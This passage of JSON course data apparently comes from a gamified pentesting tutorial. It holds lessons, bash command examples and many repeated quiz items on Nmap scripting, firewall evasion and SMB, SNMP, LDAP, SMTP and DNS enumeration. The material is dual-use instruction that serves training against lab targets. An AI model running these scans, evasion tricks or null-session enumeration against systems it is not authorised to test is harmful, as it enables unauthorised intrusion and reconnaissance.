points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"nmap -oX produces...","opts":["Text output","XML output (for tool integration)","Greppable output","Binary output"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-nmap-nse-categories","cat":"Reconnaissance","title":"NSE Script Categories","diff":2,"xp":150,"intro":"Nmap scripts organized by purpose: auth, vuln, discovery, exploit.","sections":[{"type":"text","content":"NSE scripts are categorized: auth (credential testing), vuln (vulnerability checks), discovery (info gathering), exploit (actual exploitation), brute (password attacks)."},{"type":"code","lang":"bash","content":"nmap --script=auth target\nnmap --script=vuln target\nnmap --script=discovery target\nnmap --script=exploit target\nnmap --script=vuln,safe target  # combine categories"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"The 'vuln' NSE category checks for...","opts":["Open ports","Known vulnerabilities","User accounts","DNS records"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-nmap-firewall-evasion","cat":"Reconnaissance","title":"Nmap Firewall Evasion","diff":3,"xp":200,"intro":"Bypass firewalls with fragmentation, decoys, and source port tricks.","sections":[{"type":"text","content":"Fragment packets (-f), use decoy IPs (-D), spoof source port (--source-port 53 mimics DNS), and use different scan types to bypass stateful firewalls."},{"type":"code","lang":"bash","content":"nmap -f target  # fragment packets\nnmap -D RND:10 target  # 10 random decoy IPs\nnmap --source-port 53 target  # mimic DNS traffic\nnmap -sF target  # FIN scan (bypasses some firewalls)\nnmap --data-length 25 target  # add random data"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Spoofing source port 53 mimics...","opts":["HTTP traffic","DNS traffic","SSH traffic","SMTP traffic"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-nmap-ipv6","cat":"Reconnaissance","title":"Nmap IPv6 Scanning","diff":2,"xp":150,"intro":"Scan IPv6 addresses and discover IPv6 hosts.","sections":[{"type":"text","content":"IPv6 scanning with nmap uses -6 flag. Combine with multicast discovery scripts to find link-local hosts without knowing addresses."},{"type":"code","lang":"bash","content":"nmap -6 fe80::1%eth0\nnmap -6 --script=targets-ipv6-multicast-echo fe80::1%eth0\nnmap -6 -sV -p 22,80,443 2001:db8::1"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"IPv6 scanning requires which nmap flag?","opts":["--ipv6","--6","-6","--ip-version 6"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-enum-smb","cat":"Reconnaissance","title":"SMB Enumeration Techniques","diff":2,"xp":150,"intro":"Extract users, shares, and policies from Windows SMB services.","sections":[{"type":"text","content":"SMB reveals user lists, share names, password policies, and OS versions through null sessions or authenticated access."},{"type":"code","lang":"bash","content":"enum4linux -a target\nsmbclient -L //target -N\ncrackmapexec smb target -u '' -p '' --shares --users\nnmap --script smb-enum-shares,smb-enum-users target"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"A null session connects with...","opts":["Admin credentials","No credentials (anonymous)","A certificate","A token"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-enum-snmp","cat":"Reconnaissance","title":"SNMP Enumeration","diff":2,"xp":150,"intro":"Extract system info through community strings.","sections":[{"type":"text","content":"SNMP v1/v2c sends community strings in cleartext. Default 'public' is often unchanged. Walk the MIB tree for system info, processes, and interfaces."},{"type":"code","lang":"bash","content":"onesixtyone -c community-strings.txt target\nsnmpwalk -v2c -c public target 1.3.6.1.2.1.1  # system info\nsnmpwalk -v2c -c public target 1.3.6.1.2.1.25.4.2.1.2  # running processes"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"SNMP community strings are like...","opts":["Encryption keys","Passwords (sent in cleartext in v1/v2c)","Certificates","Tokens"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-enum-ldap","cat":"Reconnaissance","title":"LDAP Enumeration","diff":2,"xp":150,"intro":"Query Active Directory via LDAP for users, groups, and policies.","sections":[{"type":"text","content":"LDAP (port 389/636) exposes AD structure: users, groups, OUs, computers, password policies. Anonymous bind sometimes works."},{"type":"code","lang":"bash","content":"ldapsearch -x -H ldap://target -b 'dc=domain,dc=local'\nnmap --script ldap-search target\nldapdomaindump -u 'domain\\user' -p 'pass' target"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"LDAP anonymous bind allows...","opts":["Admin access","Querying AD without credentials","Modifying AD","Deleting accounts"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-enum-smtp","cat":"Reconnaissance","title":"SMTP User Enumeration","diff":2,"xp":150,"intro":"Verify email addresses exist via SMTP VRFY and RCPT TO.","sections":[{"type":"text","content":"SMTP servers may confirm whether a mailbox exists using VRFY, EXPN, or RCPT TO commands. This enumerates valid usernames."},{"type":"code","lang":"bash","content":"smtp-user-enum -M VRFY -U users.txt -t target\nsmtp-user-enum -M RCPT -U users.txt -t target\nnmap --script smtp-enum-users target"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"SMTP VRFY command...","opts":["Sends email","Verifies if a mailbox exists on the server","Changes passwords","Lists all emails"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-enum-dns-transfer","cat":"Reconnaissance","title":"DNS Zone Transfer","diff":1,"xp":75,"intro":"Get every DNS record when AXFR is misconfigured.","sections":[{"type":"text","content":"If a DNS server allows zone transfers to anyone, you get the complete list of all hostnames, IPs, MX records, and more."},{"type":"code","lang":"bash","content":"dig axfr target.com @ns1.target.com\nhost -t axfr target.com ns1.target.com\nfor ns in $(dig ns target.com +short); do dig axfr target.com @$ns; done"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"A successful zone transfer reveals...","opts":["Just the A record","Every DNS record in the zone","Only MX records","Only 